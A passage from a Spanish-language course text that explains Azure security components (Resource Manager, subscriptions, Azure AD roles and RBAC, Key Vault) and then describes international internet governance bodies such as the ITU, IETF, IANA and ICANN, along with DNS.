relevante cuando las dos cuentas implicadas pertenecen a organizaciones diferentes.
Puede servir, por ejemplo, para dar control sobre una cuenta a una herramienta de gestión

de ciclo de vida de aplicaciones o de copias de seguridad ofrecida como servicio. Estas
herramientas se integran con la API de AWS y usan sus propias credenciales para iniciar
sesión, relevando al cliente de la rotación de claves o la gestión de usuarios bloqueados
o caducados.
11.6. Seguridad en la nube como servicio (Secaas)

Secaas se refiere a ofrecer servicios de seguridad, que tradicionalmente están desplegados
dentro de las redes de las empresas, en un entorno en la nube. Cada vez existe un listado
más amplio de servicios de seguridad que se ofrecen en entornos en la nube, entre los
que se encuentran:
• Gestión de Identidades y Accesos.
• Data Loss Prevention.
• Seguridad Web tales como filtrado web, análisis de vulnerabilidades,
monitorización, etc.
• Seguridad del correo electrónico.
• SIEM.
• VPN.
• Herramientas de seguridad perimetral como firewalls, IDS, etc.
Sin duda, el delegar los servicios de seguridad en entornos en la nube nos ofrece una
serie de ventajas:
• Disponibilidad del servicio constante.
• Gestión simplificada.
• Escalabilidad.
Sin embargo, siempre debemos tener en cuenta que la seguridad de nuestra organización
queda delegada a un tercero y debemos acotar muy bien los acuerdos del servicio.
11.7. Componentes de Azure

Como paso previo a analizar los conceptos y algunos de los subsistemas relacionados
con la implementación de la seguridad en Azure, es necesario describir los principales
componentes de Azure.
La estructura organizativa de los recursos en Azure, tal como se muestra en la página
de DocsMicrosoft (2022), consta de cuatro niveles que presentamos en la Tabla 3.

Tabla 8 Estructura organizativa de los recursos en Azure. Fuente: adaptado de la página de DocsMicrosoft, 2022.
Ilustración 46 Estructura organizativa de Azure. Fuente: página de DocsMicrosoft, 2022.
Cuando se elimina un grupo de recursos, además se eliminan todos los que contiene. La
organización de los recursos del ciclo de vida es útil en entornos que no son de producción,
donde se puede probar y rechazar posteriormente. Los grupos de recursos son el ámbito
para aplicar el control de acceso basado en roles (RBAC). Al aplicar permisos RBAC a un
grupo de recursos se puede administrar y restringir fácilmente el acceso.
AZURE RESOURCE MANAGER

Permite configurar y administrar Azure. Proporciona una capa administrativa que posibilita
crear, actualizar y eliminar recursos de la cuenta de Azure. Permite Administrar el control
de acceso, bloqueos y etiquetas para maximizar la protección y revisar el conjunto de
recursos una vez implementados.

Cuando un usuario realiza un envío de solicitud de una herramienta, una API o un SDK de
Azure, el componente Resource Manager es el que la recibe. Posteriormente, autentica y
aprueba la solicitud.
Finalmente, Resource Manager envía una solicitud al servicio de Azure, que realiza la
acción solicitada. Todas las solicitudes son manejadas por la misma API, por lo que se
mostrarán los resultados y la funcionalidad consistentes en los diferentes servicios o
herramientas. La Figura 2 muestra el rol del administrador de recursos en el manejo de
solicitudes de Azure.
Ilustración 47 Azure Resource Manager. Fuente: página de DocsMicrosoft, 2022.
Además de que todas las funcionalidades son accesibles en Azure Portal, también
son accesibles usando PowerShell, la CLI de Azure, las API REST y los SDK de cliente. Las
funcionalidades que inicialmente están disponibles mediante las API se incluirán en el
portal a los seis meses de su disponibilidad inicial.
SUSCRIPCIONES DE AZURE
Para usar Azure se necesita una suscripción. Estas proporcionan acceso autenticado y
autorizado a los productos y servicios de Azure. Además, le posibilita el aprovisionamiento
de los recursos. Una unidad lógica o conjunto de servicios de Azure asociados con su
cuenta es una suscripción, que es una identidad en Azure Active Directory (Azure AD) o un
directorio de confianza de Azure AD.

Ilustración 48 Subscripciones en Azure. Fuente: página de DocsMicrosoft, 2022.
Cualquier cuenta puede contener una o más suscripciones con diferentes modelos de
pago y políticas de control de acceso. Se puede utilizar una suscripción de Azure para
establecer límites en sus productos, servicios y recursos. Según DocsMicrosoft (2022) hay
dos tipos de límites de suscripción:
Tabla 9 Dos tipos de límites de suscripción de Azure. Fuente: adaptado de DocsMicrosoft, 2022.
GRUPOS DE ADMINISTRACIÓN DE AZURE
Si su empresa posee una gran cantidad de suscripciones, es posible que se requiera

una forma de administrar eficazmente el acceso, la política o directiva y el grado de
cumplimiento de esas suscripciones. La administración por grupos de Azure proporciona
un nivel de ámbito más allá de las suscripciones. Estas se organizan en contenedores
denominados grupos de administración y los términos de gobierno se aplican dichos
grupos.
Todas las suscripciones en un determinado grupo de administración heredarán
de forma automática las condiciones que se aplican al mencionado grupo. Los
grupos de administración brindan el servicio a gran escala a nivel de organización,

independientemente del tipo de suscripción adquirido. Todas las suscripciones de un
grupo administrativo deben tener confianza con el mismo inquilino de Azure AD. Por
ejemplo, puede aplicar una política o directivas a un grupo de administración que limite
las regiones a disposición para crear máquinas virtuales. Esta política se aplica a todos
los grupos administrativos, sus suscripciones y sus recursos, lo que le permite crear solo
máquinas virtuales en esta región.
GRUPOS DE ADMINISTRACIÓN Y SUSCRIPCIONES: JERARQUÍA
Puede crear una estructura muy flexible en cuanto a los grupos de administración y las
suscripciones con el objetivo de organizar los recursos jerárquicamente para el acceso
unificado y la administración de políticas o directivas. La Figura 4 muestra un ejemplo del
uso de un grupo de administración para crear una jerarquía de administración.
Ilustración 49 . Grupos de Administración en Azure. Fuente: DocsMicrosoft, 2022.
11.8. Azure Active Directory

Es evidente que comparten un nombre similar, pero Azure AD no es una versión en la nube
de Windows Server Active Directory. Tampoco pretende reemplazar completamente la
instancia de Active Directory local. Si se utiliza el servidor de Windows AD, puede conectarse
con Azure AD y extender su directorio a Azure. Este método posibilita a los usuarios acceder
a recursos locales y basados en la nube utilizando las mismas credenciales. Los usuarios

también pueden usar Azure AD por separado de Windows AD.
Las pequeñas empresas pueden usar Azure AD como su único servicio de directorio para
controlar el acceso a productos y aplicaciones SaaS, por ejemplo: Microsoft 365, Salesforce
y Dropbox. Hay que tener en consideración que este método no suministra un modelo de
administración completamente centralizado (por ejemplo, una computadora local con
Windows autenticada con credenciales locales). Los usuarios pueden crear aplicaciones
que usan Azure AD para proporcionar mecanismos de autenticación y autorización que
los usuarios pueden administrar en un solo sitio.
Ilustración 50 Active Directory y Azure AD. Fuente: DocsMicrosoft, 2022.
DIRECTORIOS, SUSCRIPCIONES Y USUARIOS
Microsoft dispone actualmente de varios servicios en la nube, como Azure, 365, Intune y
Dynamics 365, y cualquiera puede usar Azure AD para definir usuarios y crear una política
de acceso.
Cuando una organización o compañía realiza una suscripción en uno de estos servicios
se le proporciona un directorio predeterminado, que es una instancia de Azure AD. Dicho
directorio dispone de los usuarios y grupos que pueden acceder a los servicios adquiridos
por la organización. Este directorio predeterminado se llama inquilino. Este está asociado
a la organización y al directorio predeterminados, es decir, el inquilino representa a la
organización y al directorio.
Las suscripciones de Azure son entidades de facturación y constituyen una frontera
de seguridad. Recursos como máquinas virtuales, sitios web y bases de datos están
asociados con una única suscripción. Una suscripción determinada también tiene un
propietario de cuenta único que es responsable de los costos incurridos por los recursos de

la suscripción. Si su empresa desea cargar la suscripción a otra cuenta, dicha suscripción
puede transferirse.
Cada suscripción está asociada a un solo directorio perteneciente a Azure AD. Asimismo,
distintas subscripciones pueden confiar en un mismo directorio, pero cada una solo
confía en un único directorio. Puede agregar usuarios y grupos a varias suscripciones
para permitir que los usuarios creen, controlen y accedan a los recursos. Al agregar un
usuario, este debe ser conocido en el directorio correspondiente, como se puede observar
en la Figura 6.
Ilustración 51 Active directory y Azure AD. Fuente: DocsMicrosoft, 2022
11.9. Administración de usuarios y grupos en Azure AD

CREAR USUARIOS
Se necesita una cuenta de usuario Azure para poder acceder a sus recursos. Dicha cuenta
contiene toda la información necesaria para autenticar al usuario en el inicio de sesión.
Después de autenticarse, Azure AD genera un token de acceso para otorgar permisos
al usuario y determinar a qué recursos tendrá acceso. Se debe utilizar el panel de Azure
Active Directory en Azure Portal para trabajar con las cuentas de usuario.
Únicamente se puede trabajar con una carpeta a la vez, pero es posible cambiar de
directorio mediante el panel Directorio+subscripción. La barra de herramientas del panel

también dispone de un botón Cambiar-directorio que le permite cambiar fácilmente
cambiar entre directorios. Para visualizar los usuarios disponibles en Azure AD, seleccionar
Usuarios en Administración en la ventana del menú de la izquierda. Se muestra el panel
Todos los usuarios. Tenga en cuenta las columnas: Tipo de usuario y Emisor de identidad,
como se observa en la Figura 7.
Ilustración 52 Usuarios Azure AD. Fuente: página de DocsMicrosoft, 2022.
Normalmente, Azure AD define usuarios de tres maneras, según DocsMicrosoft (2022):

1. Creación de un grupo
Tabla 10 Tres tipos de usuarios. Fuente: adaptado de DocsMicrosoft, 2022.

Azure AD Connect es un servicio que posibilita sincronizar su instancia de Active Directory
con la instancia de Azure AD. De esta forma, la mayoría de los clientes comerciales añaden
usuarios a su directorio. La ventaja de este enfoque es que los usuarios pueden acceder a
recursos locales y basados en la nube mediante el inicio de sesión único (SSO).
Se puede añadir nuevos usuarios de forma manual desde el portal de Azure. Esta es
la forma más sencilla de añadir un número limitado de usuarios. Se debe poseer la
función/rol de administrador de usuarios para poder realizarlo. Si se debe añadir una
gran cantidad usuarios, es preferible utilizar herramientas de línea de comandos. Puede
agregar usuarios basados en la nube ejecutando el comando Azure PowerShell New-
AzureADUser.
Los grupos de Azure AD ayudan a organizar a los usuarios con una administración
de permisos más sencilla. Permiten a los propietarios de recursos (o propietarios de
directorios de Azure AD) asignar una serie de permisos a todos los miembros del grupo
a la vez evitando tener que hacerlo de forma individual. Los grupos posibilitan establecer
fronteras de seguridad, añadir y eliminar usuarios específicos y permitir o denegar el
acceso con un mínimo esfuerzo. Además, Azure AD posibilita establecer la unión a un
grupo en función de reglas como el departamento de trabajo u ocupación del usuario.
Según DocsMicrosoft (2022), Azure AD posibilita definir dos tipos de grupos:
Tabla 11 Tipos de grupos según Azure AD. Fuente: DocsMicrosoft, 2022.

Ilustración 53 Grupos en Azure AD. Fuente: DocsMicrosoft, 2022.
Cuando se crea un grupo en Azure AD, se tienen las mismas opciones que cuando se
crean los usuarios. Azure Portal es la manera más sencilla para la creación un grupo. Se
tiene que seleccionar el tipo de grupo (seguridad o Microsoft 365) y especificar un nombre
de grupo, una descripción y tipo de unión o pertenencia únicos. También puede utilizarse
Azure PowerShell para agregar grupos mediante el comando New-AzureADGroup, como
se muestra a continuación.
Ilustración 54 Adición de grupos en Azure AD. Fuente: DocsMicrosoft, 2022.
ROLES
Según DocsMicrosoft (2022):
«Azure AD proporciona varios roles integrados para cubrir los escenarios de seguridad más comunes.
Para entender cómo funcionan los roles, vamos a examinar cuatro roles que son válidos en cualquier
tipo de recurso:
• Propietario, que tiene acceso total a todos los recursos, incluido el derecho a delegar
este acceso a otros.
• Colaborador, que puede crear y administrar todos los tipos de recursos de Azure,
pero no conceder acceso a otros.
• Lector, que puede ver los recursos existentes de Azure.
Administrador de acceso de usuario: permite administrar el acceso de los usuarios a
los recursos de Azure».

Ilustración 55 . Visión de Roles en Azure AD. Fuente: DocsMicrosoft, 2022.
DocsMicrosoft (2022), también afirma lo siguiente:

«Estos son algunos de los escenarios que puede implementar con Azure RBAC.
• Permitir que un usuario administre las máquinas virtuales de una suscripción y que
otro usuario administre las redes virtuales
• Prmiso a un grupo de administradores de base de datos para administrar bases de
datos SQL en una suscripción
• Permitir que un usuario administre todos los recursos de un grupo de recursos, como
las máquinas virtuales, los sitios web y las subredes
• Permitir que una aplicación acceda a todos los recursos de un grupo de recursos».
Una función o rol es un conjunto de características y propiedades definidas en un

archivo JSON. La definición de este rol incluye: nombre, identificador y descripción.
Además, se incluyen permisos relativos a Actions, que se pueden otorgar, los permisos
NotActions, que no se pueden otorgar y el alcance o ámbito del rol, como puede ser
el acceso de escritura). P.e., el rol de propietario que incluye todas las acciones, es
indicado por medio un asterisco (*). Si ninguna acción se rechaza, al incluirse todos los
ámbitos, es indicado por la barra (/). Puede consultar esta información usando cmdlet-
GetAzRoleDefinitionPowerShell Owner.

Ilustración 56 Roles en Azure AD. Fuente: DocsMicrosoft, 2022.
Las características Actions y NotActions se pueden configurar para dar y denegar los
permisos que requeridos de forma precisa. Estas características se presentan con el
siguiente formato:
{Company}.{ProviderName}/{resourceType}/{action}.
Ilustración 57 . Roles y permisos en Azure AD. Fuente: DocsMicrosoft, 2022.
En Actions, el operador comodín (*) significa que la identidad de seguridad especificada

para esta función o rol puede ejecutar todas las acciones. En resumen, este rol puede
manejar todo, incluso acciones definidas más adelante, cuando Azure agregue nuevos tipos
de recursos. Como rol lector, solo se posibilita acción de lectura. Las acciones NotActions
se eliminan de Actions. Como rol de colaborador, NotActions elimina la capacidad para
configurar, administrar y especificar el acceso a recursos. Con respecto a las operaciones
sobre datos especificadas por las propiedades DataActions y NotDataActions, se pueden
especificar independientemente de las operaciones administrativas.
Esto evita que las tareas existentes que utilizan comodines (*) accedan repentinamente
a los datos. Según DocsMicrosoft (2022):
«Estas son las operaciones de datos que se pueden especificar con DataActions y NotDataActions:
• Leer una lista de blobs en un contenedor

• Escribir un blob de almacenamiento en un contenedor
• Eliminar un mensaje de una cola».
Únicamente se pueden añadir operaciones de datos a DataActions y NotDataActions. El

proveedor de recursos determina cuál es la operación de datos habilitando la propiedad
isDataAction a true. Los roles sin manipulación de datos pueden omitir estos atributos de
su definición.
Estas acciones se comportan de forma igual a sus equivalentes para administrar.
Especifique las acciones que desea que sean permitidas (o * en todos los casos) y luego
proporcione una lista de acciones específicas para eliminar de la colección NotDataActions.
Puedes ver la lista completa de acciones y acciones de datos en la documentación del
proveedor de recursos:
Ilustración 58 Acciones sobre los datos. Fuente: DocsMicrosoft, 2022.
Para definir las características-propiedades Actions y NotActions no es suficiente a la

hora implementar un rol completamente. Además, es necesario detallar el ámbito que
va a tener el rol o función. La característica AssignableScopes del rol detalla los ámbitos
(suscripciones, grupos de recursos o recursos) en los que el citado rol está disponible en
la relación a su asignación. Se puede posibilitar que un rol personalizado esté disponible
para su asignarse únicamente en las suscripciones o los grupos de recursos que se
requieran, para no saturar la experiencia de usuario con las suscripciones o grupos de
recursos restantes.
Ilustración 59 Ámbito de un rol. Fuente: DocsMicrosoft, 2022.

Azure AD incorpora roles integrados que seguramente tienen una cobertura total de lo
que se puede pretender realizar. En la medida de lo posible, es recomendable utilizar un
rol integrado, no obstante, se pueden crear roles de forma personalizada, si es necesario.
Un rol puede ser creado de varias formas, según DocsMicrosoft (2022):
• Azure Portal. Puede usar Azure Portal para crear un rol personalizado: Azure
Active Directory > Roles y administradores > Nuevo rol personalizado.
• Azure PowerShell. Puede usar el cmdlet New-AzADMSRoleDefinition para
definir un rol nuevo.
• Graph API de Azure. Se puede usar una llamada de REST a Graph API para
crear un rol mediante programación.
Una vez que se ha determinado quién, qué y dónde, se puede relacionar esta información
para otorgar el acceso. Una asignación de roles consiste en enlazar un rol con una entidad
de servicio dentro de un ámbito específico con el objetivo de otorgar el acceso. Es preciso
crear una asignación de roles para poder otorgar el acceso. Es necesario eliminar la
asignación de roles para revocar el acceso.
En el siguiente ejemplo se muestra cómo se le asignó el rol de colaborador al grupo de
marketing dentro del ámbito del grupo de recursos de ventas.
Ilustración 60 Asignación de un rol. Fuente: DocsMicrosoft, 2022.
AZURE AD CONNECT
Las organizaciones que utilizan una implementación de Windows Server Active Directory
local pueden integrar a los usuarios y grupos existentes con Azure Active Directory a través
del servicio independiente Azure AD Connect. Es una herramienta libre de pago que se
puede instalar para sincronizar una instancia de AD local con un directorio de Azure.
Mediante Azure AD Connect se puede suministrar a los usuarios de una identidad única y
común aplicaciones de Microsoft 365, Azure y SaaS integradas con Azure AD dentro de un
ambiente de identidad híbrido.

Ilustración 61 Azure AD Connect. Fuente: DocsMicrosoft, 2022.
DocsMicrosoft (2022), Azure AD Connect incorpora varios componentes que pueden

instalarse con el objetivo de implementar un sistema de identidades híbrido:
Tabla 12 Componentes para un sistema de entidad híbrido. Fuente: DocsMicrosoft, 2022.
La integración de directorios locales con Azure AD hace que los usuarios sean más
productivos, dado que se les proporciona una identidad común para tener acceso a
recursos de nube y locales. Los usuarios y las organizaciones obtienen las siguientes
ventajas, según DocsMicrosoft (2022).

Tabla 13 Ventajas obtenidas por los usuarios. Fuente: adaptado de DocsMicrosoft, 2022.
Una implementación de Azure AD Connect es una tarea compleja y necesita un

planeamiento inicial adecuado antes de comenzar. Microsoft dispone de una guía
completa de instalación necesaria para preparar, instalar, configurar y probar la
instalación de AD Connect.
11.10. Configuración y administración

Azure Key Vault es un servicio centralizado para custodiar secretos de aplicación como
claves de cifrado, certificados y tokens del lado servidor. Para controlar los secretos de
aplicación, Key Vault los guarda en una única ubicación central y posibilita un acceso
seguro, gestión de permisos y registro de accesos.
Según la página de DocsMicrosoft (2022), «Azure Key Vault se usa tres conceptos
principales en cualquier instancia: almacenes, claves y secretos.
ALMACENES
Azure Key Vault se utiliza para construir contenedores seguros llamados almacenes. Los
almacenes posibilitan minimizar que se pierda información de seguridad centralizando
el almacenamiento de los secretos de las aplicaciones. Las empresas necesitarán
almacenes de claves. Un almacén de claves es un conjunto de claves criptográficas y
datos protegidos criptográficamente, llamados «secretos», administrados por una o
varias personas (las mínimas necesarias).
Los almacenes de claves contienen los grupos lógicos de claves y secretos de la empresa
que se van a administrar conjuntamente. Serían como los directorios del sistema de
archivos controlando y registrando el acceso a toda la información almacenada. Se
pueden administrar a través de herramientas como Azure PowerShell, la CLI de Azure, la
API REST o Azure Portal.
CLAVES
Una clave específica dentro de un almacén de claves es un recurso criptográfico que

tiene uso concreto, como las claves asimétricas que se usan para SQL Server TDE (cifrado
de datos transparente) o copia de seguridad cifrada.
Las aplicaciones no poseen acceso directo a las claves almacenadas una vez que se
agregan a un almacén de claves. Tienen que utilizar las claves llamando a métodos de
criptografía en el servicio Key Vault que realiza la operación solicitada dentro de su ámbito
de protección. Nunca se tiene acceso directo a las claves por parte de la aplicación.
Una clave puede pertenecer a una sola instancia o tener versiones. En el último caso,
una clave es un objeto con una clave principal (activa) y una colección de varias claves
secundarias creadas cuando se renuevan. Key Vault permite claves asimétricas (RSA
2048). Las aplicaciones pueden usarlas para cifrar o firmar datos.
Según DocsMicrosoft (2022), existen dos variantes de claves de Key Vault: con protección
por hardware y con protección por software.
Ilustración 62 Creación de almacenes. Fuente: página de DocsMicrosoft, 2022
Tabla 9. Variantes de claves de Key Vault. Fuente: adaptado de la página de DocsMicrosoft, 2022.

SECRETOS
Los secretos son conjuntos de datos (menos de 10K) protegidos por una clave creada
por HSM generada con el almacén de claves. Permiten hacer más sencilla la tarea de la
persistencia de los datos sensibles, las aplicaciones tienen: claves de almacenamiento,
certificados, cadenas de conexión SQL, claves de cifrado de datos, etc.
USO DEL ALMACÉN DE CLAVES

A través de estos componentes, cualquier instancia de Azure Key Vault permite atajar los
siguientes problemas según, DocsMicrosoft (2022):
Tabla 10. Problemas que ataja Azure Key Vault. Fuente: adaptado de página de DocsMicrosoft, 2022.

NORMATIVAS
Y PROTOCOLOS
INTERNACIONALES

1. Normativa Tecnológica –
Digital Internacional
1.1. La Unión Internacional de Telecomunicaciones
La UIT es el organismo especializado de las Naciones Unidas para las tecnologías de

la información y la comunicación – TIC, que fue fundada en el año 1865 para facilitar
la conectividad internacional de las redes de comunicaciones. Además, atribuye en el
plano mundial el espectro de frecuencias radioeléctricas y las órbitas de satélite, elabora
las normas técnicas que garantizan la interconexión armoniosa de redes y tecnologías,
y se esfuerza por mejorar el acceso a las TIC para las comunidades insuficientemente
atendidas del mundo entero. La UIT está comprometida para conectar a toda la
población mundial – dondequiera que viva y cualesquiera que sean sus medios, ya que
su compromiso es proteger y apoyar el derecho de toda persona a comunicarse.
Las Comisiones de Estudio del Sector de Normalización de las Telecomunicaciones de

la UIT (UIT-T) reúnen a expertos de todo el mundo para elaborar normas internacionales
conocidas como Recomendaciones UIT, que actúan como elementos definitorios de la
infraestructura mundial de las Tecnologías de la Información y la Comunicación (TIC).
Las normas resultan indispensables para la interoperabilidad de las TIC, y cuando
intercambiamos mensajes de voz, vídeo o datos, las normas hacen posibles las
comunicaciones globales asegurando que las redes y dispositivos de TIC de los distintos
países utilizan un mismo lenguaje.
La Unión Internacional de Telecomunicaciones, a través de su Oficina de Desarrollo de
las Telecomunicaciones (BDT), organiza una Conferencia Mundial de Desarrollo de las

Telecomunicaciones (CMDT) en el periodo entre dos Conferencia de Plenipotenciarios
para examinar temas, proyectos y programas pertinentes para el desarrollo de las
telecomunicaciones.
Las CMDT fijan las estrategias y los objetivos a efectos del desarrollo de las
telecomunicaciones/TIC, facilitando orientaciones y directrices al Sector de Desarrollo de
las Telecomunicaciones (UIT-D) para el futuro.
En la actualidad la UIT cuenta con 193 Estados Miembros, así como de unas 900 empresas,
universidades y organizaciones internacionales y regionales.
Por otra parte, existen los acuerdos de interconexión que alcanzan los proveedores
de acceso a Internet, que operan en distintos niveles de la red, pudiendo clasificarse
en operadores Tier 1 (operadores de grandes líneas de enlace internacional), Tier 2
(operadores de enlaces nacionales o regionales) y Tier 3 (los proveedores de acceso a
Internet).
1.2. Internet Society

Se trata de una organización no gubernamental y sin ánimo de lucro, fundada en 1992 y
dedicada al desarrollo mundial de Internet y con la tarea específica de concentrar sus
esfuerzos y acciones en asuntos particulares sobre Internet.
ISOC tiene como objetivo principal ser un centro de cooperación y coordinación global
para el desarrollo de protocolos y estándares compatibles.
Con oficinas en Washington DC, Estados Unidos, y en Ginebra, Suiza, busca asegurar el
desarrollo, la evolución y la utilización de Internet en beneficio de las personas en todo el
mundo.
La Internet Society aborda las cuestiones que afronta el futuro de Internet y es el hogar
de organización de los grupos responsables de las normas de infraestructura de Internet,
incluidas:
• IAB – Internet Architecture Board – Supervisión y aprobación de normas.

• IETF – Internet Engineering Task Force – Especificación de estándares
técnicos.
• IESG – Internet Engineering Steering Group – Coordinación.
• IANA – Internet Assigned Number Authority – Asignación de recursos.
1.3. Internet Architecture Board (IAB)

Brinda dirección técnica de largo alcance para el desarrollo de Internet, asegurando
que continúe creciendo y evolucionando como una plataforma para la innovación y la
comunicación global.
En su trabajo, el IAB se esfuerza por:
• Garantizar que Internet sea un medio de comunicación confiable que
proporcione una base técnica sólida para la privacidad y la seguridad

• Establecer la dirección técnica para una Internet que permitirá que miles de
millones de personas más se conecten, respaldar la visión de un Internet de
las cosas (IoT) y permitir que las redes móviles prosperen, manteniendo las
capacidades básicas que han sido la base del éxito de Internet, y
• Promover la evolución técnica de una Internet abierta y sin controles especiales,
especialmente los que dificultan la confianza en la red.
1.4. Internet Engineering Task Force (EITF)

El Grupo de trabajo de ingeniería de Internet (IETF) o Internet Engineering Task Force
(IETF) es el primer organismo de normas de Internet que desarrolla estándares abiertos a
través de procesos abiertos para hacer que Internet funcione mejor.
El IETF es una gran comunidad internacional abierta de diseñadores, operadores,
comercializadores e investigadores de redes que se ocupan de la evolución de Internet
y su buen funcionamiento.
Es un grupo de participación abierta a todos los interesados, en los que se fijan estándares
para seguridad en Internet, empaquetamiento de datos, ruteo de datos, entre otros,
donde destaca la administración de los protocolos TCP/IP. A pesar de su carácter no
vinculante, la IETF tiene un vasto poder regulatorio sobre Internet en lo que respecta a
protocolos y estándares técnicos.
Su trabajo gira en torno a diversas áreas de trabajo, que coordinan la discusión entre
sus miembros. La principal herramienta de política en la que se traduce el trabajo de la
IETF es en los RFC (estudiado en su respectivo tema), que significa literalmente «request
for comments» (petición de comentarios), en que algunos de ellos son informativos,
experimentales y otros son sancionados como estándares.
1.5. Internet Engineering Steering Group (IESG)

Es un organismo compuesto por el presidente del Internet Engineering Task Force (IETF) y
directores de área. Proporciona la revisión técnica final de los estándares de Internet y es
responsable de la gestión del día a día de la IETF.

Recibe las apelaciones de las decisiones de los grupos de trabajo, y el IESG toma la
decisión de avanzar documentos en el desarrollo de las normas.
1.6. Internet Assigned Number Authority (IANN)

Las funciones de la IANN se remontan a 1970, aunque en la actualidad los servicios los
proporciona Public Technical Identifiers, una organización especialmente diseñada para
proporcionar las funciones de la IANA a la comunidad, afiliada a la ICANN.
La coordinación global de la raíz DNS, el direccionamiento IP y otros recursos del protocolo
de Internet se realiza como funciones de la Autoridad de Números Asignados de Internet
(IANA).
Son los responsables de coordinar algunos de los elementos clave que hacen que
Internet funcione sin problemas. Si bien Internet es conocida por ser una red mundial
sin coordinación central, existe una necesidad técnica de que algunas partes clave de
Internet estén coordinadas globalmente, y la IANN asume esta función de coordinación.
Específicamente, asignan y mantienen códigos únicos y sistemas de numeración que se
utilizan en los estándares técnicos (“protocolos”) que impulsan Internet, que se pueden
agrupar en términos generales en tres categorías:
1. Nombres de dominio: Gestión de la Raíz DNS, los dominios .int y .arpa, y un recurso
de prácticas de IDN.
2. Recursos numéricos: Coordinación global de números IP y AS, brindándolos
principalmente a los Registros Regionales de Internet (RIR).
3. Asignaciones de protocolo: Los sistemas de numeración de los protocolos de
Internet se gestionan en conjunto con los organismos de normalización.
1.7. Corporación de Internet para la Asignación de Nombres

y Números (ICANN)
La ICANN fue creada en 1998 como una corporación de bien público y sin fines de lucro,
con una comunidad integrada por participantes de todo el mundo dedicados a mantener
una Internet segura, estable e interoperable. Esta asociación promueve la competencia y
desarrolla políticas de identificadores únicos de Internet.
La misión de la ICANN es ayudar a garantizar una Internet global, unificada, estable y
segura. Para contactar a otra persona en Internet se debe ingresar una dirección – un
nombre o un número – en nuestra computadora u otro dispositivo. Esa dirección debe
ser única para que los equipos puedan localizarse unos a otros. La ICANN coordina estos
identificadores exclusivos en todo el mundo, sin los cuales, sería imposible tener una
internet a nivel mundial.
ICANN no controla el contenido de Internet. No puede detener el correo basura y no
gestiona los accesos a Internet, pero gracias a su función de coordinación del sistema de
nombres de Internet, tiene una gran importancia en la expansión y evolución de Internet.

¿QUÉ ES EL SISTEMA DE NOMBRES DE DOMINIO?
El sistema de nombres de dominio o DNS es un sistema diseñado para que Internet
sea accesible para las personas. La principal forma en la que los equipos informáticos
que conforman Internet se encuentren entre sí es mediante una serie de números
(denominada “dirección IP”), que es específica de cada dispositivo. Sin embargo, para
el cerebro humano es difícil recordar largas listas de números, por lo que el DNS utiliza
letras en lugar de números y vincula una serie precisa de letras a una serie concreta de
números.
Como ejemplo, el sitio web de ICANN puede encontrarse en “icann.org” en lugar de en
“192.0.32.7”, que es como lo conocen las computadores de la red. Una de las ventajas de
este sistema (aparte de facilitar mucho a las personas el uso de la red) es que un nombre
de dominio concreto no tiene porqué vincularse a una computadora específica, ya que
el vínculo entre un dominio particular y una dirección IP concreta puede modificarse de
forma fácil y rápida. Este cambio se reconoce en toda Internet en un plazo de 48 horas
gracias a que la infraestructura DNS está actualizándose constantemente. El resultado es
un sistema extremadamente flexible.
Los nombres de dominio se componen de dos partes, separadas por “el punto”. En la
parte derecha del punto se encuentra el dominio de primer nivel o TLD, y corresponde
con las terminaciones “com”, “net” u “org”, entre otras. En cada caso hay una compañía
(denominada registro) a cargo de todos los dominios que terminan con ese TLD concreto
y que tiene acceso a una lista completa con todos los dominios que tienen ese nombre,
así como las direcciones IP con las que están asociadas esos nombres. La primera parte,
que se encuentra antes del punto, es el nombre de dominio en el que se registra y que se
utiliza para ofrecer sistemas en línea como sitios web o correo electrónico. Estos dominios
se venden a través de un gran número de “registradores”, que pueden estipular libremente
el precio de sus servicios, aunque en cada caso pagan una cuota fija por dominio al
registro concreto bajo cuyo nombre está registrado el dominio.
ICANN redacta contratos con cada registro. Aunque hay una importante excepción en lo
que respecta a los “dominios de primer nivel de código de país” (ccTLD) como el caso de .es
para España o .uk para el Reino Unido. Hay más de 250 ccTLD, algunos de los cuales tienen
un contrato con ICANN, otros han firmado acuerdos de colaboración con ICANN, y hay otros
que aún deben formalizar algún acuerdo con ICANN. Sin embargo, ICANN realiza lo que se
conoce como la “función IANA” según la cual todas las direcciones principales de ccTLD se
incluyen en una lista para que el resto de Internet pueda encontrarlas. ICANN también se
encuentra en posición de añadir nuevos TLD cuando se amplía el sistema, como ocurrió
en 2000 y 2004, cuando se “añadieron a la raíz” siete y seis TLD respectivamente.
También gestiona un sistema de acreditación para los registradores. Estos contratos
ofrecen un entorno coherente y estable para el sistema de nombres de domino, y por ello
para Internet.
En resumen, el DNS ofrece un sistema de direcciones de Internet para que los usuarios
puedan encontrar sitios web concretos, y constituye la base del correo electrónico y de
muchos otros usos en línea.

¿QUÉ RELACIÓN HAY ENTRE ICANN Y LAS DIRECCIONES IP?
ICANN desempeña un papel administrativo similar con las direcciones IP que utilizan las
computadoras que con los nombres de dominio que utilizan los humanos. De la misma
forma que no puede haber dos nombres de dominios iguales (ya no se sabría dónde se
podría acabar), por el mismo motivo no es posible que haya dos direcciones IP iguales.
De nuevo, ICANN no gestiona el sistema, pero ayuda a coordinar la forma en que se
suministran las direcciones IP para evitar fallos o repeticiones. ICANN es también el
almacén central de direcciones IP, y suministra los rangos a los registros regionales para
que éstos los distribuyan a sus proveedores de redes.
¿QUÉ SON LOS SERVIDORES DE RAÍZ?

Los servidores de raíz son entidades distintas. Hay 13 servidores raíz o, más precisamente,
13 direcciones IP en Internet en las que pueden encontrarse a los servidores raíz (los
servidores que tienen una de las 13 direcciones IP pueden encontrarse en docenas de
ubicaciones físicas distintas). Todos estos servidores almacenan una copia del mismo
archivo que actúa como índice principal de las agendas de direcciones de Internet.
Enumeran una dirección para cada dominio de nivel principal (.com, .es, etc.) en la que
puede encontrarse la propia agenda de direcciones de ese registro.
En realidad, los servidores raíz no se consultan con mucha frecuencia (considerando el
tamaño de Internet) porque una vez que las computadoras de la red conocen la dirección
de un dominio de nivel principal concreto pueden conservarla, y sólo comprueban de
forma ocasional que esa dirección no haya cambiado. Sin embargo, los servidores raíz
siguen siendo una parte vital para el buen funcionamiento de Internet.
Las entidades encargadas de operar los servidores raíz son bastante autónomas, pero al
mismo tiempo colaboran entre sí y con ICANN para asegurar que el sistema permanece
actualizado con los avances y cambios de Internet.
POR TANTO, ¿CUÁL ES LA FUNCIÓN DE ICANN?

La función de ICANN es supervisar la ingente y compleja red interconectada de
identificadores únicos que permite a las computadoras contactar entre sí en Internet.
Esto se denomina “resolución universal” y significa que, dondequiera que se encuentre
